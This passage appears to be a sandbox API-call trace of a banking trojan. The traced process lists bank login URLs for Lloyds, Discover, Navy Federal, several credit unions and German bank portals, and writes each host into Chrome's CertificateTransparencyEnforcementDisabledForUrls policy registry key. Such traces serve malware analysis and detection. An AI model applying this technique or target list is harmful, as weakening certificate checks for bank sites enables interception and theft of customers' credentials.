	[0191.477] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178fa0 | out: hHeap=0x260000) returned 1
	[0191.477] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178f48 | out: hHeap=0x260000) returned 1
	[0191.477] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178f48
	[0191.477] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178f48 | out: hHeap=0x260000) returned 1
	[0191.477] strstr (_Str="https://secure.lloydsbank.co.uk/personal/a/logon/entermemorableinformation.jsp*", _SubStr="https://") returned="https://secure.lloydsbank.co.uk/personal/a/logon/entermemorableinformation.jsp*"
	[0191.477] strncpy (in: _Dest=0x1dfa58, _Source="secure.lloydsbank.co.uk/personal/a/logon/entermemorableinformation.jsp*", _Count=0x17 | out: _Dest="secure.lloydsbank.co.uk") returned="secure.lloydsbank.co.uk"
	[0191.477] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.477] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x138) returned 0x35ae60
	[0191.477] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1179ad0 | out: hHeap=0x260000) returned 1
	[0191.477] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f178
	[0191.477] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x290) returned 0x0
	[0191.477] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x298, lpdwDisposition=0x0) returned 0x0
	[0191.477] RegSetValueExA (in: hKey=0x298, lpValueName="10", Reserved=0x0, dwType=0x1, lpData="secure.lloydsbank.co.uk", cbData=0x17 | out: lpData="secure.lloydsbank.co.uk") returned 0x0
	[0191.478] RegCloseKey (hKey=0x298) returned 0x0
	[0191.478] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.478] strstr (_Str="secure.lloydsbank.co.uk", _SubStr="www.") returned 0x0
	[0191.478] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.478] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f128
	[0191.478] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f128 | out: hHeap=0x260000) returned 1
	[0191.478] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.478] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.478] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.478] strstr (_Str="*/rcrd/1553272786902342*", _SubStr="https://") returned 0x0
	[0191.478] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.478] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x1174f28
	[0191.478] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1174f28 | out: hHeap=0x260000) returned 1
	[0191.478] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.478] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x11750e8
	[0191.478] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11750e8 | out: hHeap=0x260000) returned 1
	[0191.479] strstr (_Str="https://onlinebanking.afcu.org/*/uux.aspx*", _SubStr="https://") returned="https://onlinebanking.afcu.org/*/uux.aspx*"
	[0191.479] strncpy (in: _Dest=0x1dfa58, _Source="onlinebanking.afcu.org/*/uux.aspx*", _Count=0x16 | out: _Dest="onlinebanking.afcu.orgk") returned="onlinebanking.afcu.orgk"
	[0191.479] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.479] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f128
	[0191.479] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x294) returned 0x0
	[0191.479] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x29c, lpdwDisposition=0x0) returned 0x0
	[0191.479] RegSetValueExA (in: hKey=0x29c, lpValueName="11", Reserved=0x0, dwType=0x1, lpData="onlinebanking.afcu.org", cbData=0x16 | out: lpData="onlinebanking.afcu.org") returned 0x0
	[0191.480] RegCloseKey (hKey=0x29c) returned 0x0
	[0191.480] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.480] strstr (_Str="onlinebanking.afcu.org", _SubStr="www.") returned 0x0
	[0191.480] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.480] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f6c8
	[0191.480] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f6c8 | out: hHeap=0x260000) returned 1
	[0191.480] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.480] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.480] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.480] strstr (_Str="*/rcrd/1553272366261807*", _SubStr="https://") returned 0x0
	[0191.480] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.480] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c4f0
	[0191.480] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c4f0 | out: hHeap=0x260000) returned 1
	[0191.480] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.480] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.480] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.480] strstr (_Str="https://www.altraonline.org/login/login.aspx?new=y", _SubStr="https://") returned="https://www.altraonline.org/login/login.aspx?new=y"
	[0191.480] strncpy (in: _Dest=0x1dfa58, _Source="www.altraonline.org/login/login.aspx?new=y", _Count=0x13 | out: _Dest="www.altraonline.orgorg") returned="www.altraonline.orgorg"
	[0191.480] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.481] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f6c8
	[0191.481] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x298) returned 0x0
	[0191.481] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x2a0, lpdwDisposition=0x0) returned 0x0
	[0191.481] RegSetValueExA (in: hKey=0x2a0, lpValueName="12", Reserved=0x0, dwType=0x1, lpData="www.altraonline.org", cbData=0x13 | out: lpData="www.altraonline.org") returned 0x0
	[0191.482] RegCloseKey (hKey=0x2a0) returned 0x0
	[0191.482] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.482] strstr (_Str="www.altraonline.org", _SubStr="www.") returned="www.altraonline.org"
	[0191.482] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x29c) returned 0x0
	[0191.482] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x2a4, lpdwDisposition=0x0) returned 0x0
	[0191.482] RegSetValueExA (in: hKey=0x2a4, lpValueName="13", Reserved=0x0, dwType=0x1, lpData="altraonline.org", cbData=0xf | out: lpData="altraonline.org") returned 0x0
	[0191.483] RegCloseKey (hKey=0x2a4) returned 0x0
	[0191.483] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.483] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f790
	[0191.483] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f790 | out: hHeap=0x260000) returned 1
	[0191.483] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.483] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.483] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.483] strstr (_Str="*/rcrd/1551276554703372*", _SubStr="https://") returned 0x0
	[0191.483] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.483] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c4f0
	[0191.484] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c4f0 | out: hHeap=0x260000) returned 1
	[0191.484] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.484] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.484] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.484] strstr (_Str="https://portal.discover.com/customersvcs/universalLogin/signin", _SubStr="https://") returned="https://portal.discover.com/customersvcs/universalLogin/signin"
	[0191.484] strncpy (in: _Dest=0x1dfa58, _Source="portal.discover.com/customersvcs/universalLogin/signin", _Count=0x13 | out: _Dest="portal.discover.com") returned="portal.discover.com"
	[0191.484] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.484] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c8) returned 0x3282e0
	[0191.484] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35ae60 | out: hHeap=0x260000) returned 1
	[0191.484] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f790
	[0191.484] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x2a0) returned 0x0
	[0191.484] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x2a8, lpdwDisposition=0x0) returned 0x0
	[0191.484] RegSetValueExA (in: hKey=0x2a8, lpValueName="14", Reserved=0x0, dwType=0x1, lpData="portal.discover.com", cbData=0x13 | out: lpData="portal.discover.com") returned 0x0
	[0191.485] RegCloseKey (hKey=0x2a8) returned 0x0
	[0191.485] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.485] strstr (_Str="portal.discover.com", _SubStr="www.") returned 0x0
	[0191.485] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.485] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191420
	[0191.485] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191420 | out: hHeap=0x260000) returned 1
	[0191.486] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.486] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.486] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.486] strstr (_Str="*/rcrd/1527164640571442*", _SubStr="https://") returned 0x0
	[0191.486] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.486] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191420
	[0191.486] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191420 | out: hHeap=0x260000) returned 1
	[0191.486] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.486] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.486] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.486] strstr (_Str="*banking-private/portal*", _SubStr="https://") returned 0x0
	[0191.486] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.486] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191420
	[0191.486] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191420 | out: hHeap=0x260000) returned 1
	[0191.486] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.486] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.486] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.486] strstr (_Str="https://*.de/banking-*/portal?*", _SubStr="https://") returned="https://*.de/banking-*/portal?*"
	[0191.486] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.486] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191420
	[0191.486] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191420 | out: hHeap=0x260000) returned 1
	[0191.486] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.486] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.486] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.486] strstr (_Str="*wpevent=loauto&timeout=*", _SubStr="https://") returned 0x0
	[0191.486] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.486] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191420
	[0191.486] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191420 | out: hHeap=0x260000) returned 1
	[0191.486] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.486] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.486] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.486] strstr (_Str="https://*.de/banking-*/portal;*", _SubStr="https://") returned="https://*.de/banking-*/portal;*"
	[0191.486] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.486] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191420
	[0191.486] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191420 | out: hHeap=0x260000) returned 1
	[0191.486] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.486] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.486] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.487] strstr (_Str="*banking-business/portal*", _SubStr="https://") returned 0x0
	[0191.487] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.487] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191420
	[0191.487] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191420 | out: hHeap=0x260000) returned 1
	[0191.487] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.487] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.487] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.487] strstr (_Str="*portal/*portal*", _SubStr="https://") returned 0x0
	[0191.487] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.487] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191420
	[0191.487] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191420 | out: hHeap=0x260000) returned 1
	[0191.487] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.487] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.487] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.487] strstr (_Str="https://*.de/*/entry*", _SubStr="https://") returned="https://*.de/*/entry*"
	[0191.487] strstr (_Str="*ortal?bankid=*", _SubStr="https://") returned 0x0
	[0191.487] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.487] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191420
	[0191.487] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191420 | out: hHeap=0x260000) returned 1
	[0191.487] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.487] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.487] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.487] strstr (_Str="https://*.de/privatkunden/*", _SubStr="https://") returned="https://*.de/privatkunden/*"
	[0191.487] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.487] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191420
	[0191.487] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191420 | out: hHeap=0x260000) returned 1
	[0191.487] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.487] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.487] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.487] strstr (_Str="https://*.de/portal/portal*", _SubStr="https://") returned="https://*.de/portal/portal*"
	[0191.487] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.487] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191420
	[0191.487] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191420 | out: hHeap=0x260000) returned 1
	[0191.487] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.487] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.487] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.487] strstr (_Str="*/banking-private/portal*", _SubStr="https://") returned 0x0
	[0191.487] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.487] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191420
	[0191.487] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191420 | out: hHeap=0x260000) returned 1
	[0191.487] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.487] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.488] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.488] strstr (_Str="*timeout=*token*", _SubStr="https://") returned 0x0
	[0191.488] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.488] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191420
	[0191.488] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191420 | out: hHeap=0x260000) returned 1
	[0191.488] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.488] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.488] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.488] strstr (_Str="*/banking-private/entry*", _SubStr="https://") returned 0x0
	[0191.488] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.488] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191420
	[0191.488] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191420 | out: hHeap=0x260000) returned 1
	[0191.488] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.488] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.488] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.488] strstr (_Str="*/de/home/privatkunden/*.html*", _SubStr="https://") returned 0x0
	[0191.488] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.488] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191420
	[0191.488] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191420 | out: hHeap=0x260000) returned 1
	[0191.488] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.488] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.488] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.488] strstr (_Str="*/rcrd/1550482741307281*", _SubStr="https://") returned 0x0
	[0191.488] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178f48
	[0191.488] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178fa0
	[0191.488] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178fa0 | out: hHeap=0x260000) returned 1
	[0191.488] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178f48 | out: hHeap=0x260000) returned 1
	[0191.488] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178f48
	[0191.488] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1178f48 | out: hHeap=0x260000) returned 1
	[0191.488] strstr (_Str="https://*.netteller.com/login2008/Authentication/Views/Login.aspx*", _SubStr="https://") returned="https://*.netteller.com/login2008/Authentication/Views/Login.aspx*"
	[0191.488] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.488] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191420
	[0191.488] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191420 | out: hHeap=0x260000) returned 1
	[0191.488] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.488] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.488] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.488] strstr (_Str="*/rcrd/1535723065134935*", _SubStr="https://") returned 0x0
	[0191.488] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.489] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c4f0
	[0191.489] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c4f0 | out: hHeap=0x260000) returned 1
	[0191.489] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.489] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x117c340
	[0191.489] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117c340 | out: hHeap=0x260000) returned 1
	[0191.489] strstr (_Str="https://signon.navyfederal.org/siteminderagent/forms/nfcu.fcc", _SubStr="https://") returned="https://signon.navyfederal.org/siteminderagent/forms/nfcu.fcc"
	[0191.489] strncpy (in: _Dest=0x1dfa58, _Source="signon.navyfederal.org/siteminderagent/forms/nfcu.fcc", _Count=0x16 | out: _Dest="signon.navyfederal.org") returned="signon.navyfederal.org"
	[0191.489] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x117f718
	[0191.489] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191420
	[0191.489] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df764 | out: phkResult=0x1df764*=0x2a4) returned 0x0
	[0191.489] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df764, lpdwDisposition=0x0 | out: phkResult=0x1df764*=0x2ac, lpdwDisposition=0x0) returned 0x0
	[0191.489] RegSetValueExA (in: hKey=0x2ac, lpValueName="15", Reserved=0x0, dwType=0x1, lpData="signon.navyfederal.org", cbData=0x16 | out: lpData="signon.navyfederal.org") returned 0x0
	[0191.491] RegCloseKey (hKey=0x2ac) returned 0x0
	[0191.491] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x117f718 | out: hHeap=0x260000) returned 1
	[0191.491] strstr (_Str="signon.navyfederal.org", _SubStr="www.") returned 0x0
	[0191.491] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178f48
	[0191.491] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x1178fa0
